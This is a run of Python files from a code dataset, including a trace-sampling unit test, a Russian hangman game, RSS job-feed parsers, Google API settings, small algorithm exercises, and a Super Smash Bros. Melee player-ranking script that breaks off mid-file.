'8bd68312-a3ce-4bf8-a2df-896cef4289e5'\n n = 0\n while n < 1000:\n self.assertTrue(_should_sample(trace_id, 1000))\n n += 1\n\n def test_probability(self):\n ''' test that _should_sample approximates 1 in N sampling for random IDs '''\n tests_count = 50000\n error_margin = 0.05\n\n sample_rates = [1, 2, 10]\n\n for rate in sample_rates:\n sampled = n = 0\n\n while n < tests_count:\n n += 1\n if _should_sample(str(uuid.uuid4()), rate):\n sampled += 1\n\n expected = tests_count // rate\n\n acceptable_lower_bound = int(expected - (expected * error_margin))\n acceptable_upper_bound = int(expected + (expected * error_margin))\n\n self.assertLessEqual(sampled, acceptable_upper_bound)\n self.assertGreaterEqual(sampled, acceptable_lower_bound)\n\nclass TestSynchronousTracer(unittest.TestCase):\n def test_trace_context_manager_exception(self):\n ''' ensure that send_traced_event is called even if an exception is\n raised inside the context manager '''\n m_client, m_state = Mock(), Mock()\n tracer = SynchronousTracer(m_client, m_state)\n try:\n with tracer('foo'):\n raise Exception('boom!')\n except Exception:\n pass\n \n m_state.pop_event.assert_called_once_with()","sub_path":"beeline/test_trace.py","file_name":"test_trace.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"171461358","text":"import random\nimport os\n\nHANGMAN = (\n\"\"\"\n\"\"\",\n\"\"\"\n \n----------\n\"\"\",\n\"\"\"\n| \n|\n|\n|\n|\n|\n|\n|\n----------\n\"\"\",\n\"\"\"\n| \n|\n|\n|\n|\n|\n|\\\\\n| \\\\\n----------\n\"\"\",\n\"\"\"\n--------\n| \n|\n|\n|\n|\n|\n|\\\\\n| \\\\\n----------\n\"\"\",\n\"\"\"\n--------\n| |\n| \n|\n|\n|\n|\n|\\\\\n| \\\\\n----------\n\"\"\",\n\"\"\"\n--------\n| |\n| 0\n| /X\\\\\n| / \\\\\n|\n|\n|\\\\\n| \\\\\n----------\n\"\"\"\n)\nmax_wrong = len(HANGMAN) - 1\nwords = {\"УРОКИ\":\"Что можно приготовить, но нельзя съесть?\",\n \"ШАХМАТИСТ\":\"Кто ходит сидя?\",\n \"ДВЕРЬ\":\"Кто приходит, кто уходит, все ее за ручку водят.\",\n \"ДОРОГА\":\"Если б встала, до неба достала б.\",\n \"День\":\"К вечеру умирает, по утру оживает.\",\n \"РАДИО\":\"В Москве говорят, а у нас слышно.\",\n \"ВРЕМЯ\":\"Без ног и без крыльев оно, быстро летит, не догонишь его.\",\n \"ТУАЛЕТНАЯ\":\"Самая популярная бумага\",\n \"СЕКРЕТОМ\":\"Чем можно поделиться только один раз?\"}\n\nkey = random.choice(list(words.keys()))\nlength = \"-\"*len(key)\nwrong = 0\nused = []\nwhile wrong < max_wrong and \"-\" in length:\n print(HANGMAN[wrong])\n print(words[key])\n guess = input(\"Введите букву: \").upper()\n used.append(guess)\n if guess in key.upper():\n length = \"\".join(c if c.upper() in used else \"-\" for c in key)\n else:\n wrong += 1\nif \"-\" in length:\n print(\">_<\")\n print(HANGMAN[wrong])\nelse:\n print(\"Уря! 
У тебя получилось!\")\nprint(\"Вы предлагали следующие буквы: \",used)\nprint(\"Отгаданное вами в слове выглядит так: \",length,\"\\n\")\nprint(\"Было загадано слово \",key)\ninput(\"Нажмите Enter, чтобы выйти ;)\")\n","sub_path":"Viselica.py","file_name":"Viselica.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"652029307","text":"import feedparser\nfrom models import JobOffer\n\nclass Stackoverflow(object):\n \"\"\" This class parses the response of the search for remote jobs in stackoverflow \"\"\"\n \n def parse(self):\n \"\"\" Parses the results of the stackoverflow remote jobs search into a list of JobOffer objects \"\"\"\n url = \"https://stackoverflow.com/jobs/feed?l=Remote&u=Km&d=20\"\n feed = feedparser.parse(url)\n\n job_offers = []\n for entry in feed.entries:\n tags = self.extractTags(entry[\"tags\"])\n job_offer = JobOffer(entry[\"link\"], entry[\"title\"], entry[\"description\"], entry[\"author\"], entry[\"updated\"], tags)\n job_offers.append(job_offer)\n \n return job_offers\n\n def extractTags(self, tags):\n extracted_tags = []\n for tag in tags:\n extracted_tags.append(tag[\"term\"])\n\n return extracted_tags\n\nclass WeWorkRemotely(object):\n \"\"\" This class parses the response of the weworkremotely remote programming jobs rss feed \"\"\"\n\n def parse(self):\n \"\"\" Parses the results of the weworkremotely remote programming jobs into a list of JobOffer objects \"\"\"\n\n url = \"https://weworkremotely.com/categories/remote-programming-jobs.rss\"\n feed = feedparser.parse(url)\n\n job_offers = []\n for entry in feed.entries:\n job_offer = JobOffer(entry[\"link\"], entry[\"title\"], entry[\"summary\"], entry[\"title\"].split(\":\")[0], entry[\"published\"], \"\")\n job_offers.append(job_offer)\n \n return job_offers","sub_path":"rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"143602654","text":"from __future__ import unicode_literals\n\nSCOPES = [\n 'https://www.googleapis.com/auth/admin.directory.group.member',\n 'https://www.googleapis.com/auth/admin.directory.user',\n 'https://www.googleapis.com/auth/spreadsheets.readonly',\n 'https://www.googleapis.com/auth/admin.directory.group'\n]\n\n# Stores API key\nSERVICE_ACCOUNT_FILE = 'secret/service.json'\n\n# Elections spreadsheet\nSPREADSHEET_ID = '1wnZfinKlVUsdXaz-W0ACnb_G7HFfDVlpudUSGpA1GrM'\n\nNEW_OFFICER_SHEET = 'New Officers Fa19'\n# OLD_OFFICER_SHEET = 'Returning Officers'\nMEMBER_SHEET = 'New Members Fa19'\n\nNEW_OFFICER_SHEET_ID = '75212080'\n# OLD_OFFICER_SHEET_ID = '682750401'\nMEMBER_SHEET_ID = '308324716'\n\nNEW_OFFICER_RANGE = '\\'{}\\'!A:F'.format(NEW_OFFICER_SHEET)\n#OLD_OFFICER_RANGE = '\\'{}\\'!A:F'.format(OLD_OFFICER_SHEET)\nMEMBER_RANGE = '\\'{}\\'!A:F'.format(MEMBER_SHEET)\n","sub_path":"hknlib/election/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"285903570","text":"'''\npg 116 \n'''\nx=-1\n#this is a conditional statement in python\ny = 1 if x > 0 else -1\n\n#the conditional does the same thing as this if else statement\n'''\nif x > 0:\n y = 1\nelse:\n y = -1\n''' 
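Both feed classes in rss.py above reduce to the same feedparser recipe; stripped to its core it looks like the sketch below (the URL is the one from the record, and entry field access mirrors the record's usage; the feed itself may no longer be live):

import feedparser

feed = feedparser.parse('https://stackoverflow.com/jobs/feed?l=Remote&u=Km&d=20')
for entry in feed.entries[:3]:
    # each entry behaves like a dict of feed fields
    print(entry['title'], entry['link'])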
\nprint(y)","sub_path":"PythonLearn/ch_4/ConditionalDemo.py","file_name":"ConditionalDemo.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419927673","text":"#!/usr/bin/env python2\n\nimport optparse\nimport os\nimport sys\n\nimport corpus.models as models\n\noptionParser = optparse.OptionParser(usage=\"%s \" % os.environ[\"ESMT_PROG_NAME\"], add_help_option=False)\noptionParser.add_option(\"-h\", \"--help\", action=\"help\", help=optparse.SUPPRESS_HELP)\noptionParser.add_option(\"-i\", \"--id\", dest=\"id\", help=\"language id (2 characters)\", metavar=\"ID\")\noptionParser.add_option(\"-l\", \"--language\", dest=\"language\", help=\"language name\", metavar=\"LANG\")\noptionParser.add_option(\"-n\", \"--native\", dest=\"native\", help=\"native language name\", metavar=\"LANG\")\n(options, args) = optionParser.parse_args()\n\nif not options.id:\n optionParser.error(\"No language id given\")\nif not options.language:\n optionParser.error(\"No language name given\")\nif not options.native:\n sys.stderr.write(\"Warning: no native language name given, taking english name\")\n options.native = options.language\n\nlog = sys.stdout\n\nif models.Language.objects.filter(name=options.id).exists():\n sys.stderr.write(\"Error: language \\\"%s\\\" already exists in the database\\n\" % options.id)\n sys.exit(1)\n\nl = models.Language(name=options.id, english_name=options.language, native_name=options.native)\nl.save()\nlog.write(\"Language %s => %s added to the database\\n\" % (l.name, l.english_name))\n","sub_path":"appraise/bin/addLanguage.py","file_name":"addLanguage.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"488902729","text":"import sys\nsys.path.append(\"../\")\nfrom create import *\n\nclass Solution:\n def reversekgroup(self, head, k):\n t, l = head, 0\n while t:\n t = t.next\n l += 1\n dum = p = ListNode(0)\n p.next = head\n for _ in range(l//k):\n tmp = None\n for _ in range(k):\n node = head\n head = head.next\n node.next = tmp\n tmp = node\n p1 = p.next\n p.next = tmp\n p1.next = head\n p = p1\n return dum.next\n\nif __name__ == \"__main__\":\n nums1, k = [1,2,3,4,5,6,7,8,9, 10], 3\n\n l = LinkList()\n h1 = l.create_list(nums1)\n l.print_list(h1)\n app = Solution()\n newh = app.reversekgroup(h1, k)\n l.print_list(newh)\n","sub_path":"exercise/lc/tag/list/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"318044353","text":"PUZZLE_INPUT = 1113122113\n\nsequence = str(PUZZLE_INPUT)\nfor i in range(50):\n print('iteration', i+1)\n\n i, j = 0, 0\n new_seq = []\n while i < len(sequence):\n while j < len(sequence) and sequence[j] == sequence[i]:\n j += 1\n \n size = j - i\n \n new_seq.append(str(size))\n new_seq.append(str(sequence[i]))\n\n i = j\n \n sequence = new_seq.copy()\n\nprint(len(sequence))","sub_path":"10/day10_b.py","file_name":"day10_b.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"110907045","text":"# ETossed's Algorithmic Ranking of Melee\r\n# This is a MAJOR work in progress, and I'm getting a foundation down for\r\n# a more advanced ranking at some point\r\n\r\n# Tournament is to be implemented in more complicated ELO system later\r\n# Non-Local tournamnets 
are the only one that counts. Superlocals (i.e. Nimbus 70) do count.\r\n\r\nimport math\r\n\r\nclass Tournament(object):\r\n def __init__(self, name, size, winner):\r\n self.name = name\r\n self.size = size\r\n self.winner = winner\r\n\r\n def __repr__(self):\r\n temp = None\r\n if self.size == 1:\r\n temp = \"Superlocal (Non-Cali)\"\r\n if self.size == 2:\r\n temp = \"Regional\"\r\n elif self.size == 3:\r\n temp = \"Super Regional\"\r\n elif self.size == 4:\r\n temp = \"Major\"\r\n elif self.size == 5:\r\n temp = \"Super Major\"\r\n return \"Tournament: \" + self.name + \"| Size: \" + temp + \" | Winner: \" + self.winner.tag\r\n\r\nclass Player(object):\r\n def __init__(self, tag, rank):\r\n self.tag = tag\r\n self.rank = rank\r\n self.sets_played = 0\r\n self.tournaments = []\r\n self.wins = []\r\n self.losses = []\r\n self.melee_lvl = 1000\r\n\r\n def __lt__(self, other):\r\n return self.melee_lvl < other.melee_lvl\r\n\r\n def __repr__(self):\r\n return self.tag + \" EAR-M: \" + str(self.melee_lvl)\r\n\r\n def printTournaments(self):\r\n tournamentString = self.tag + \"'s Tournaments Attended: \"\r\n for i in range(len(self.tournaments)):\r\n tournamentString += (\"\\n\" + self.tournaments[i].name)\r\n print(tournamentString)\r\n\r\n # ACTUAL CALCULATION DONE BELOW\r\n # STATIC ALGORITHM\r\n def lvl_calculator(self, tournament, placement, opponents, history):\r\n # Tournament is the tournament that was attended\r\n # Placement is the player's placement at that tournament\r\n # Opponents is a player array\r\n # History is the list correlated with opponents with w or l\r\n if len(opponents) != len(history):\r\n print(\"ERROR: Amount of matches does not match amount of opponents for \" + self.tag + \" - \" + tournament.name)\r\n return\r\n\r\n self.tournaments.append(tournament)\r\n\r\n # Result loop\r\n for i in range(len(opponents)):\r\n self.sets_played += 1\r\n\r\n # For Wins\r\n if history[i] == \"w\":\r\n if opponents[i] in self.wins:\r\n self.melee_lvl += (5 * (((101 - opponents[i].rank) * (math.log((101-opponents[i].rank)))) / 100))\r\n else:\r\n self.wins.append(opponents[i])\r\n self.melee_lvl += (10 * (((101 - opponents[i].rank) * (math.log((101-opponents[i].rank)))) / 100))\r\n\r\n # For Losses\r\n elif history[i] == \"l\":\r\n if opponents[i] in self.losses:\r\n self.melee_lvl -= (3.5 * ((opponents[i].rank * (math.log(opponents[i].rank)))/ 100))\r\n else:\r\n self.losses.append(opponents[i])\r\n self.melee_lvl -= (7 * ((opponents[i].rank * (math.log(opponents[i].rank)))/ 100))\r\n\r\n # For neither\r\n else:\r\n raise ValueError('NotWOrL')\r\n\r\n # Placement Integration?\r\n if placement == 1:\r\n placement = 10\r\n elif placement == 2:\r\n placement = 9\r\n elif placement == 3:\r\n placement = 8\r\n elif placement == 4:\r\n placement = 6\r\n elif placement == 5:\r\n placement = 4\r\n elif placement == 7:\r\n placement = 3\r\n elif placement == 9:\r\n placement = 2\r\n elif placement == 13:\r\n placement = 1\r\n elif placement == 17:\r\n placement = 0\r\n elif placement == 25:\r\n placement = -1\r\n elif placement == 33:\r\n placement = -2\r\n elif placement == 49:\r\n placement = -3\r\n elif placement == 65:\r\n placement = -4\r\n elif placement == 97:\r\n placement = -5\r\n elif placement == 129:\r\n placement = -6\r\n else:\r\n placement = 0\r\n print(\"Placement error with \" + self.tag + \" at \" + tournament.name)\r\n\r\n neg = False\r\n if (placement - (10 - (tournament.size * 2))) < 0:\r\n neg = True\r\n\r\n p_s = ((placement - (10 - (tournament.size * 2)))**2) * 
tournament.size\r\n if neg == True:\r\n p_s *= -1\r\n\r\n self.melee_lvl += p_s\r\n\r\ndef printSortedPlayers(players):\r\n players.sort(reverse=True)\r\n newPlayerList = []\r\n for i in range(len(players)):\r\n if players[i].melee_lvl != 1000:\r\n newPlayerList.append(players[i])\r\n for i in range(len(newPlayerList)):\r\n print(str(i+1) + \". \" + newPlayerList[i].tag + \" | 2019 Rank: \" + (str(newPlayerList[i].rank)) + \" | EAR-M: \" + (str(\"{:.2f}\".format(newPlayerList[i].melee_lvl))) + \"\\n\")\r\n\r\n# GIANT LIST OF PLAYERS BELOW\r\n\r\nHungrybox = Player(\"Hungrybox\", 1)\r\nLeffen = Player(\"Leffen\", 2)\r\nMango = Player(\"Mango\", 3)\r\nAxe = Player(\"Axe\", 4)\r\nWizzrobe = Player(\"Wizzrobe\", 5)\r\nZain = Player(\"Zain\", 6)\r\naMSa = Player(\"aMSa\", 7)\r\nPlup = Player(\"Plup\", 8)\r\niBDW = Player(\"iBDW\", 9)\r\nMew2King = Player(\"Mew2King\", 10)\r\nS2J = Player(\"S2J\", 11)\r\nFiction = Player(\"Fiction\", 12)\r\nSFAT = Player(\"SFAT\", 13)\r\nMoky = Player(\"moky\", 14)\r\nn0ne = Player(\"n0ne\", 15)\r\nTrif = Player(\"Trif\", 16)\r\nCaptain_Faceroll = Player(\"Captain Faceroll\", 17)\r\nSwedish_Delight = Player(\"Swedish Delight\", 18)\r\nHax = Player(\"Hax$\", 19)\r\nLucky = Player(\"Lucky\", 20)\r\nGinger = Player(\"Ginger\", 21)\r\nSpark = Player(\"Spark\", 22)\r\nChuDat = Player(\"ChuDat\", 23)\r\nPewPewU = Player(\"PewPewU\", 24)\r\nARMY = Player(\"ARMY\", 25)\r\nlloD = Player(\"lloD\", 26)\r\nAbsentPage = Player(\"AbsentPage\", 27)\r\nBananas = Player(\"Bananas\", 28)\r\nKJH = Player(\"KJH\", 29)\r\nShroomed = Player(\"Shroomed\", 30)\r\nWestballz = Player(\"Westballz\", 31)\r\nMedz = Player(\"Medz\", 32)\r\nMikeHaze = Player(\"MikeHaze\", 33)\r\nProfessor_Pro = Player(\"Professor Pro\", 34)\r\nTwoSaint = Player(\"2Saint\", 35)\r\nGahtzu = Player(\"Gahtzu\", 36)\r\nAlbert = Player(\"Albert\", 37)\r\nSpud = Player(\"Spud\", 38)\r\nFatGoku = Player(\"FatGoku\", 39)\r\nRishi = Player(\"Rishi\", 40)\r\nBimbo = Player(\"Bimbo\", 41)\r\nSetchi = Player(\"Setchi\", 42)\r\nMagi = Player(\"Magi\", 43)\r\nMorsecode = Player(\"Morecode762\", 44)\r\nJakenShaken = Player(\"JakenShaken\", 45)\r\nHugS = Player(\"HugS\", 46)\r\nStango = Player(\"Stango\", 47)\r\nZamu = Player(\"Zamu\", 48)\r\nDrephen = Player(\"Drephen\", 49)\r\nMichael = Player(\"Michael\", 50)\r\nIce = Player(\"Ice\", 51)\r\nbillybopeep = Player(\"billybopeep\", 52)\r\nLa_Luna = Player(\"La Luna\", 53)\r\nColbol = Player(\"Colbol\", 54)\r\nOverTriforce = Player(\"OverTriforce\", 55)\r\nSlox = Player(\"Slox\", 56)\r\nKalamazhu = Player(\"Kalamazhu\", 57)\r\nNickemwit = Player(\"Nickemwit\", 58)\r\nJerry = Player(\"Jerry\", 59)\r\nAura = Player(\"Aura\", 60)\r\nNut = Player(\"Nut\", 61)\r\nKalvar = Player(\"Kalvar\", 62)\r\nPolish = Player(\"Polish\", 63)\r\nKevin_Maples = Player(\"Kevin Maples\", 64)\r\nBladewise = Player(\"Bladewise\", 65)\r\nTai = Player(\"Tai\", 66)\r\nSquid = Player(\"Squid\", 67)\r\nForrest = Player(\"Forrest\", 68)\r\nJoyboy = Player(\"Joyboy\", 69)\r\nKodorin = Player(\"Kodorin\", 70)\r\nRyan_Ford = Player(\"Ryan Ford\", 71)\r\nFree_Palestine = Player(\"Free Palestine\", 72)\r\nRyobeat = Player(\"Ryobeat\", 73)\r\nKa_Master = Player(\"Ka-Master\", 74)\r\nKurv = Player(\"Kurv\", 75)\r\nFrenzy = Player(\"Frenzy\", 76)\r\nMoG = Player(\"MoG\", 77)\r\nBoyd = Player(\"Boyd\", 78)\r\nCool_Lime = Player(\"Cool Lime\", 79)\r\nBBB = Player(\"Bobby Big Ballz\", 80)\r\nNintendude = Player(\"Nintendude\", 81)\r\nFranz = Player(\"Franz\", 82)\r\nNicki = Player(\"Nicki\", 83)\r\nlint = 
Player(\"lint\", 84)\r\nKing_Momo = Player(\"King Momo\", 85)\r\nTheRealThing = Player(\"TheRealThing\", 86)\r\nUmarth = Player(\"Umarth\", 87)\r\nZeo = Player(\"Zeo\", 88)\r\nPricent = Player(\"Pricent\", 89)\r\nPrince_Abu = Player(\"Prince Abu\", 90)\r\nAmsah = Player(\"Amsah\", 91)\r\nRocky = Player(\"Rocky\", 92)\r\nSharkz = Player(\"Sharkz\", 93)\r\nHTwa = Player(\"HTwa\", 94)\r\nKage = Player(\"Kage\", 95)\r\nSchythed = Player(\"Schythed\", 96)\r\nPanda = Player(\"Panda\", 97)\r\nSoonsay = Player(\"Soonsay\", 98)\r\nTheSWOOPER = Player(\"TheSWOOPER\", 99)\r\nSnowy = Player(\"Snowy\", 100)\r\nPlus100 = Player(\"Player Worse than Rank 100\", 101)\r\n\r\nplayer_list = [Hungrybox, Leffen, Mango, Axe, Wizzrobe, Zain, aMSa, Plup, iBDW, Mew2King, S2J, Fiction, SFAT, Moky, n0ne, Trif, Captain_Faceroll, Swedish_Delight, Hax, Lucky, Ginger, Spark, ChuDat, PewPewU, ARMY, lloD, AbsentPage, Bananas, KJH, Shroomed, Westballz, Medz, MikeHaze, Professor_Pro, TwoSaint, Gahtzu, Albert, Spud, FatGoku, Rishi, Bimbo, Setchi, Magi, Morsecode, JakenShaken, HugS, Stango, Zamu, Drephen, Michael, Ice, billybopeep, La_Luna, Colbol, OverTriforce, Slox, Kalamazhu, Nickemwit, Jerry, Aura, Nut, Kalvar, Polish, Kevin_Maples, Bladewise, Tai, Squid, Forrest, Joyboy, Kodorin, Ryan_Ford, Free_Palestine, Ryobeat, Ka_Master, Kurv, Frenzy, MoG, Boyd, Cool_Lime, BBB, Nintendude, Franz, Nicki, lint, King_Momo, TheRealThing, Umarth, Zeo, Pricent, Prince_Abu, Amsah, Rocky, Sharkz, HTwa, Kage, Schythed, Panda, Soonsay, TheSWOOPER, Snowy]\r\n\r\n# GIANT LIST OF PLAYERS DONE\r\n\r\n# TOURNAMENTS CONSIDERED\r\n\r\nValhalla3 = Tournament(\"Valhalla III\", 3, Leffen)\r\nGenesis7 = Tournament(\"Genesis 7\", 5, Zain)\r\nSavingMrLombardi2 = Tournament(\"Saving Mr. Lombardi 2\", 3, Fiction)\r\nSmashSummit9 = Tournament(\"Smash Summit 9\", 4, Hungrybox)\r\nHTL5 = Tournament(\"Hold That L 5\", 1, Ginger)\r\nDreamhackAnaheim = Tournament(\"Dreamhack Anaheim 2020\", 2, Fiction)\r\n\r\ndef main():\r\n # If a player's comment says \"NONE\" it means they have not attended any tournaments on the list above\r\n\r\n # Hungrybox\r\n Hungrybox1O = [Spud, Captain_Faceroll, PewPewU, Zain, Fiction, Hax, Mango, Zain]\r\n Hungrybox1R = [\"w\", \"w\", \"w\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Hungrybox2O = [Hax, aMSa, Mango, Fiction, Plup, n0ne, Mango, Plup, Plup, Plup]\r\n Hungrybox2R = [\"w\", \"w\", \"w\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\"]\r\n Hungrybox.lvl_calculator(Genesis7, 2, Hungrybox1O, Hungrybox1R)\r\n Hungrybox.lvl_calculator(SmashSummit9, 1, Hungrybox2O, Hungrybox2R)\r\n\r\n # Leffen\r\n Leffen1O = [Frenzy, Professor_Pro, Professor_Pro]\r\n Leffen1R = [\"w\", \"w\", \"w\"]\r\n Leffen2O = [Schythed, MikeHaze, Hax, Fiction, Mango, Hax]\r\n Leffen2R = [\"w\", \"w\", \"w\", \"w\", \"l\", \"l\"]\r\n Leffen3O = [Spark, Wizzrobe, Axe, n0ne, Zain, BBB, Mango, iBDW]\r\n Leffen3R = [\"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"l\", \"l\"]\r\n Leffen.lvl_calculator(Valhalla3, 1, Leffen1O, Leffen1R)\r\n Leffen.lvl_calculator(Genesis7, 5, Leffen2O, Leffen2R)\r\n Leffen.lvl_calculator(SmashSummit9, 9, Leffen3O, Leffen3R)\r\n\r\n # Mango\r\n Mango1O = [Nicki, Trif, aMSa, Leffen, Zain, Hungrybox]\r\n Mango1R = [\"w\", \"w\", \"w\", \"w\", \"l\", \"l\"]\r\n Mango2O = [Shroomed, Fiction, Hungrybox, aMSa, Hax, Plup, Leffen, Hungrybox, Axe, Zain, Plup]\r\n Mango2R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Mango.lvl_calculator(Genesis7, 3, Mango1O, Mango1R)\r\n Mango.lvl_calculator(SmashSummit9, 3, 
Mango2O, Mango2R)\r\n\r\n # Axe\r\n Axe1O = [Panda, Plup]\r\n Axe1R = [\"l\", \"l\"]\r\n Axe2O = [Zain, Leffen, Spark, Wizzrobe, Plup, aMSa, Fiction, Mango]\r\n Axe2R = [\"w\", \"l\", \"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Axe.lvl_calculator(Genesis7, 33, Axe1O, Axe1R)\r\n Axe.lvl_calculator(SmashSummit9, 5, Axe2O, Axe2R)\r\n\r\n # Wizzrobe\r\n Wizzrobe1O = [Ryobeat, Medz, Spark, Captain_Faceroll]\r\n Wizzrobe1R = [\"l\", \"w\", \"w\", \"l\"]\r\n Wizzrobe2O = [Leffen, Wizzrobe, iBDW, Axe, Fiction]\r\n Wizzrobe2R = [\"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Wizzrobe.lvl_calculator(Genesis7, 17, Wizzrobe1O, Wizzrobe1R)\r\n Wizzrobe.lvl_calculator(SmashSummit9, 9, Wizzrobe2O, Wizzrobe2R)\r\n\r\n # Zain\r\n Zain1O = [Boyd, JakenShaken, Shroomed, Hungrybox, Mango, Hungrybox]\r\n Zain1R = [\"w\", \"w\", \"w\", \"w\", \"w\", \"w\"]\r\n Zain2O = [n0ne, Axe, Wizzrobe, iBDW, Leffen, Fiction, Plup, iBDW, Mango]\r\n Zain2R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Zain.lvl_calculator(Genesis7, 1, Zain1O, Zain1R)\r\n Zain.lvl_calculator(SmashSummit9, 4, Zain2O, Zain2R)\r\n\r\n # aMSa\r\n aMSa1O = [Ice, Mew2King, Mango, n0ne]\r\n aMSa1R = [\"w\", \"w\", \"l\", \"l\"]\r\n aMSa2O = [Magi, Hungrybox, Pricent, Mango, Fiction, Shroomed, BBB, Axe]\r\n aMSa2R = [\"w\", \"l\", \"w\", \"l\", \"l\", \"w\", \"w\", \"l\"]\r\n aMSa.lvl_calculator(Genesis7, 9, aMSa1O, aMSa1R)\r\n aMSa.lvl_calculator(SmashSummit9, 9, aMSa2O, aMSa2R)\r\n\r\n # Plup\r\n Plup1O = [Rocky, PewPewU, Axe, ARMY]\r\n Plup1R = [\"w\", \"l\", \"w\", \"l\"]\r\n Plup2O = [Hax, Shroomed, Magi, Hungrybox, Mango, Axe, Zain, Hungrybox, Mango, Hungrybox, Hungrybox]\r\n Plup2R = [\"l\", \"w\", \"w\", \"l\", \"w\", \"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Plup.lvl_calculator(Genesis7, 25, Plup1O, Plup1R)\r\n Plup.lvl_calculator(SmashSummit9, 2, Plup2O, Plup2R)\r\n\r\n # iBDW\r\n iBDW1O = [BBB, ARMY, PewPewU, Ice, Captain_Faceroll]\r\n iBDW1R = [\"w\", \"w\", \"l\", \"w\", \"l\"]\r\n iBDW2O = [Trif, ARMY, Albert, Lucky, Kalamazhu, Squid, Professor_Pro, Fiction, S2J, Fiction]\r\n iBDW2R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n iBDW3O = [BBB, n0ne, Zain, Wizzrobe, Spark, Pricent, Leffen, Hax, Zain]\r\n iBDW3R = [\"w\", \"l\", \"l\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n iBDW.lvl_calculator(Genesis7, 13, iBDW1O, iBDW1R)\r\n iBDW.lvl_calculator(SavingMrLombardi2, 2, iBDW2O, iBDW2R)\r\n iBDW.lvl_calculator(SmashSummit9, 5, iBDW3O, iBDW3R)\r\n\r\n # Mew2King\r\n Mew2King1O = [Soonsay, Professor_Pro, aMSa, ARMY, Swedish_Delight]\r\n Mew2King1R = [\"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Mew2King.lvl_calculator(Genesis7, 13, Mew2King1O, Mew2King1R)\r\n\r\n # S2J\r\n S2J1O = [Joyboy, Zain, Ryobeat, n0ne]\r\n S2J1R = [\"w\", \"l\", \"w\", \"l\"]\r\n S2J2O = [Ginger, Westballz, Ice, Prince_Abu, Franz, Kalamazhu, Professor_Pro, Lucky, Ginger, Professor_Pro, iBDW]\r\n S2J2R = [\"w\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n S2J3O = [Tai, ARMY, Fiction, Westballz, Fiction, Fiction]\r\n S2J3R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n S2J.lvl_calculator(Genesis7, 13, S2J1O, S2J1R)\r\n S2J.lvl_calculator(SavingMrLombardi2, 3, S2J2O, S2J2R)\r\n S2J.lvl_calculator(DreamhackAnaheim, 2, S2J3O, S2J3R)\r\n\r\n # Fiction\r\n Fiction1O = [Free_Palestine, ChuDat, Westballz, Leffen, Captain_Faceroll, n0ne, Hungrybox]\r\n Fiction1R = [\"w\", \"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Fiction2O = [Spark, Lucky, Bimbo, ARMY, Ginger, iBDW, iBDW]\r\n Fiction2R = 
[\"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"w\"]\r\n Fiction3O = [Pricent, Mango, Hax, Hungrybox, aMSa, Magi, Zain, Wizzrobe, Axe]\r\n Fiction3R = [\"w\", \"l\", \"w\", \"l\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Fiction4O = [Westballz, S2J, S2J, S2J]\r\n Fiction4R = [\"w\", \"w\", \"l\", \"w\"]\r\n Fiction.lvl_calculator(Genesis7, 5, Fiction1O, Fiction1R)\r\n Fiction.lvl_calculator(SavingMrLombardi2, 1, Fiction2O, Fiction2R)\r\n Fiction.lvl_calculator(SmashSummit9, 7, Fiction3O, Fiction3R)\r\n Fiction.lvl_calculator(DreamhackAnaheim, 1, Fiction4O, Fiction4R)\r\n\r\n # SFAT\r\n SFAT1O = [Tai, Ginger, billybopeep, Panda, Hax]\r\n SFAT1R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n SFAT2O = [Captain_Faceroll, MikeHaze, Professor_Pro, Kodorin, Nut, Ginger, Trif]\r\n SFAT2R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"l\", \"l\"]\r\n SFAT.lvl_calculator(Genesis7, 17, SFAT1O, SFAT1R)\r\n SFAT.lvl_calculator(SavingMrLombardi2, 9, SFAT2O, SFAT2R)\r\n\r\n # moky\r\n Moky1O = [Forrest, Nut, Kevin_Maples, Ryobeat]\r\n Moky1R = [\"l\", \"w\", \"l\", \"w\"]\r\n Moky.lvl_calculator(Genesis7, 33, Moky1O, Moky1R)\r\n\r\n # n0ne\r\n n0ne1O = [Kodorin, Hax, MikeHaze, Ginger, S2J, aMSa, Fiction]\r\n n0ne1R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n n0ne2O = [Zain, iBDW, Leffen, Spark, Ryobeat, 